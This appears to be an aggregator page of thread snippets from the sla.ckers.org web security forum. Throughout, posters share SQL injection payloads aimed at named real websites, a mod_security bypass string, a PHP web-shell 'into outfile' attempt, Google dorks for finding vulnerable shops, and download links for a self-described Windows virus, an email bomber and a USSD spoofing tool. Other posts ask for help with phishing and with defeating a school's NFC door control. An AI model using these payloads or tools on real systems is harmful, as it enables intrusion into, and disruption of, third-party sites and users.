sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net
news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

Proxy Browser - Surf the internet anonymously (no replies)


Proxy Browser is a Windows application that will give you access to different proxy servers.

To use is quite simple:
1) Install the application
2) Run Proxy Browser
3) Type the address and surf the net

For a new proxy, close the window and run Proxy Browser again

EXTRA: Updates are available by email privateloader@hotmail.com

Download:
[www.firedrive.com]

Virustotal:
[www.virustotal.com]

Acer E1-510 - Windows 8.1 Resources Booster (no replies)


Optimize your Acer E1-150 or any Windows 8.1 operating system, making it run even faster by closing native applications.


->Note: Consider using Autoruns from Microsoft to disable them...


Download:
https://www.mediafire.com/?qr3bdfg0f5x3o34

Virustotal:
https://www.virustotal.com/pt/file/a9899337344a2dd74fb42b1b9d790e7ce19186a8f9bf19587d8ca7e88367ab6c/analysis/1408141574/

XSS Scanner BETA 1.0 (no replies)


This software will scan a site looking for XSS vulnerabilities.
It is easy to use: it only requires that a user type the address + search parameter in order to scan.

The scan is clean and if a vulnerability passes through, an alert will pop up with a vuln number.
Check the source to get the XSS code...

Warning: This is a new project, the XSS database is a bit small.

Download:
http://www.mediafire.com/download/0kbj6cd4vroussa/XSS_Scanner_BETA_1.0.rar

Virustotal:
https://www.virustotal.com/pt/file/e5ec7e5b22a095049908a0f20ba0a1e39ffe5d2c1570db3abaf3dfad9832662d/analysis/1407939128/

sql injection error with string pass (no replies)


please can anyone explain me how to fix error to inject it

http://www.pakcyber.com/portfolio.php?start=news

Sqli Injection Bypass (1 reply)


Hello ...

i have just a doubt please help

suppose we have 11 dynamic pages in a website like as

index.php?id=1 ( page ok )
index.php?id=2 ( page ok )
index.php?id=3 ( page ok )
index.php?id=4 ( page ok )
index.php?id=5 ( page ok )
index.php?id=6 ( page ok )
index.php?id=7 ( page ok )
index.php?id=8 ( page ok )
index.php?id=9 ( page ok )
index.php?id=10 ( page ok )
index.php?id=11 ( page ok )
index.php?id=12 ( Blank page no out put instantly )

security enabled : Mod_Security & comment escaped
mode security bypassed with /*!UNIunionON*/ ALL /*!SEselectLECT*/ but now the page shows same redirecting at single page suppose it 11th page
how can i bypass this security ?

i think injection is Time based Blind
Can i bypass such injections ??

[Virus] Windows 8 Resources Blocker + Source (no replies)


This is a virus for windows 8 and basically what it does is use the function taskkill to terminate common windows 8 executables.

Effects:
1) It will close various executables.
2) The CPU will go to 100% as it works in a loop.

Check the source for more details.

Download:
http://www.firedrive.com/file/73E2817DD73AEEE7

Password:
http://tinyurl.com/pfganfq

any useful auto database? (no replies)


Hi,

Does anyone know of any useful automotive database?

Hacked, cracked, etc

dom xss is possible ? (no replies)


dom xss is possible in ie browsers in code ?
<html>
<head>
<script language="JavaScript">
function onLoad() {
parent.setTimeout("zk.bmk.onIframeLoaded('"+window.location+"')",0);
}
</script>
</head>
<body onload="onLoad()">
</body>
</html>

is located in http://grepcode.com/file/repo1.maven.org/maven2/org.zkoss.zk/zk/6.5.1.1/web/js/zk/bookmark.html


in ie8 browser injection in url ');// error message zk undefined, bmk null or undefined.
How is reproduce injection dom xss ?

The sql injection (1 reply)


For this sql injection,how to bypass IT?

http://www.premises.com.au/residetails.php?id=6140725


http://www.premises.com.au/residetails.php?id=6140725'

NFC Security (no replies)


Hi guys,
I was redirected here by a friend to ask a few questions. I hope this thread will not be a one-reply topic but a section where we'll discuss security in NFC tags and readers.
He tried to answer a few of my questions but I hope for other answers.

I'm a 20 year old student, and as my homework I got NFC security.
Before I start, let me tell you about my equipment: I own this device and a tag (actually 3 tags: the paper, a key, and a card).

w w w. s8.postimg.org/aek39k2it/photo1.jpg

Now my "homework" is to find a security hole/try to break it/ in school, where the system is set up so that the tag reader identifies a tag by the ID of the tag and, if the tag is located in the database, it allows access to the room.

I need to get into it without knowing any tags, actually I know them, but that's not the point.

~Can NFC Tag ID be changed or can it be controlled by a script ?
~ If so how ?

~Can I bruteforce NFC reader using HCE NFC phone / device ?
~ If so how ?

~Does the reader that I have, the ACR122 manufactured by ACS.com.hk, keep logs ?
(tried to find out but without success)

That is for the beginning. I hope you guys will help me with my study, I would appreciate it very much.

Identify base64 looking text (no replies)


Hi,
while searching for injection points I came across a base64-type looking argument to the id param. Can anyone help me identify what it is exactly and how to decode/encode it? It ain't base64, I tried decoding it.

http://u.laaptu.com/login1.action?id=0mYOgRQ6Hqmry/ianstwtUOz5SJOVqi59VoLNz0uwSE=

Exploitable (no replies)


Hi guys can you give me the status of this parameter ?

http://www.bhtelecom.ba/laptopi-detalji.html?&tx_ssgenericrenderer_pi1[uid]=12

edit smb_relay.rb (no replies)


Hello,
I have been trying to figure out how to modify the smb_relay.rb metasploit module to use the same session that is created for uploading a payload to a share, and use it to download all files in the share to /tmp/loot. Has anyone done this before? Any help would be much appreciated. Thank you.

Change user (2 replies)


Is it possible to change user using sql injection ?
So you can get privileges ?

Greetings (1 reply)


Hello all,
I'm an unprofessional pentester/blackhat for hire who's looking to share knowledge and expand my current social circle with other knowledgeable people in the field, power in numbers y'know?

It's a pity this forum looks slightly dead for the current time, I hope that will change.

Cheers,
nopesled

injection alters javascript file (1 reply)


OK here's the dealio, I am asked to code a bookings page for a taxi firm I used to work for using PHP/mySQL. The owner won't pay much so I don't sanitize user input etc and generally do a half arsed job hoping, maybe, that i'll be asked back to do some more work on it and get paid more.
Well it kinda works out for me as some attacker manages to re-write an included javascript file so that it does this (appended to the included js file):
document.write('<script type="text/javascript" src="http://www.kyasshingu-shinsa-a1.asia/7nqth9gv.php?id=100737776"></script>');

So my question is this. How did he/she (the attacker) alter this file?
did they get the ftp password? if so how? what other avenues did/could they use to alter this file?

The js file only provided form validation, checking if boxes were filled in etc.

P.S I won't be so neglectful in future even though I did get paid extra for sorting my own mess out!

Thanks for any insights in advance.

h! iam lggoloza (1 reply)


iam lggoloza from the china

be good at: Xss. linux Kernel driver. intranet penetration

Namaste! (1 reply)


Namaste, everyone,am new here,can anyone help me in Phishing!

another one (no replies)


http://www.recreatingeden.com/index.php?pid=8+order+by+5--+

i dont have permission ?_?

why this 400 bad request?? (5 replies)


order by and union all select works

but injections to retrieve data not^^ why?

http://www.piemontfungo.com/store/index.php?prod=1888+union+all+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database%28%29

i need to refresh my memory... (2 replies)


omg i need to remember some sqlinj^^

http://www.pubblicitafaidate.it/index.php?prod=96

easy inj for some of u^^ (no replies)


http://www.geldue.it/site/index.php?prod=1&cat=Prodotti%20Complementari%27

help

Breaking out of JS String Assignment? (no replies)


I have a user controlled JavaScript string which is assigned to a variable, e.g.

var s = '(my input)';

Only three characters are converted: ' < and >

< and > are replaced with &lt; and &gt;, respectively.

The single quote (' / %27) is replaced with

' + "'" + '

For example, an input of

a'b

will result in

var s = 'a' + "'" + 'b';

and an input of 'aa'bb' will result in

var s = '' + "'" + 'aa' + "'" + 'bb' + "'" + '';


\ and / are neither converted nor escaped, so I can insert things like \u0022 or \n and I can escape the trailing ' in the string assignment.

For example, I can insert 123\ which will result in

var s = '123\';

This breaks the JavaScript syntax but does not allow me to inject code that will be interpreted.

Any ideas how to break out?

finding sql vulnerable (2 replies)


hi all, I'm finally back :P

My question is more about how to find vulnerable websites than how to hack them.

For example, for now I use the dork

Inurl:productdetail.php?id=

to find websites vulnerable to sql

and after finishing the google list I try :

inurl:productdetail.php?id= intext:lord of ring

to find new websites.

My problem is that now I can write anything I want in "intext" and I still get the same websites, not in the same order but always the same

I try with other dorks like :

inurl:index.php?id=

Once the list is done I do like before :

Inurl:index.php?id= intext:star wars

But like for productdetail.php?id= I got similar results, just not in the same order ...

As you can see I mostly search for shops, which I find more interesting for sql

So is there something I do wrong ? Or maybe there is another way to find websites?

Hola all (1 reply)


Hello everybody. I am Mg Ar Kr. Nice to meet u all and I am new here.

I am interested in SQLi, XSS most.

Have a nice day :)

./end

Symfony 2.4 Security (no replies)


Guys, do you have any experience with symfony 2.4, any security vulnerabilities you are familiar with, what to be careful about?

Regards

how to getshell (1 reply)


for this:
this can get data,but how to getshell
id=99 and extractvalue(1, concat(0x5c, (select datanase())))--

can't this
id=99 and extractvalue(1, concat(0x5c, (select '<?php system($_GET[1]);?>' into oufile '/var/www/god.php')))--

extractvalue() how to exploit "select into outfile" getshell

USSD Sender Hacktool 1.1 (2 replies)


What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly used to make requests to a mobile operator. If you want to check how much money you have on your mobile sim card you can use a USSD Command for that. Entering for example *#100# to the vodafone network, you will receive a USSD message as a result.

USSD Sender Hacktool is a complex tool that lets any web user send a text message in a USSD command to any number. By default the message is "You have been hacked!" but you can send any text. In the target phone a message will pop up with the text and an OK button. If it gets undelivered an actual sms will be sent.

Virustotal:
https://www.virustotal.com/en/file/a22e6d2879479d41a01591a925bea2efe49ddd07a91880f4f642f306d5a8eb55/analysis/1397761754/

MailChimp Email Bomber 1.0 source (1 reply)


This app will send mail to your mailbox. Win the possibility of winning $5.00 dollars by paypal just by sending an email to privateloader@iol.pt

Download:
http://www.datafilehost.com/d/dcd700c6

Virustotal:
https://www.virustotal.com/en/file/1e31051b968a011da2cdfe78cf69fdb8f23a5149a90e1ad3c6f36e1b31811c2a/analysis/1397759634/

CSRF -- Add extra cookie value (1 reply)


Hello All,
I am trying to demonstrate weak CSRF token implementation.
The request structure is something similar to following:

POST /abc HTTP/1.1

Cookie = JSESSIONID=xxxxxxx ; Token = yyyyyyyy

somename= somevalue
token = yyyyyyyy


The token value is not random and can be easily guessed.


We can control "token=" in POST body but we also need to change "token=" value from Cookies: to make both values identical.

I tried to set an extra cookie parameter using php, JS but that parameter is not getting inserted in the actual CSRF request when the user clicks on the submit button.

Any suggestions?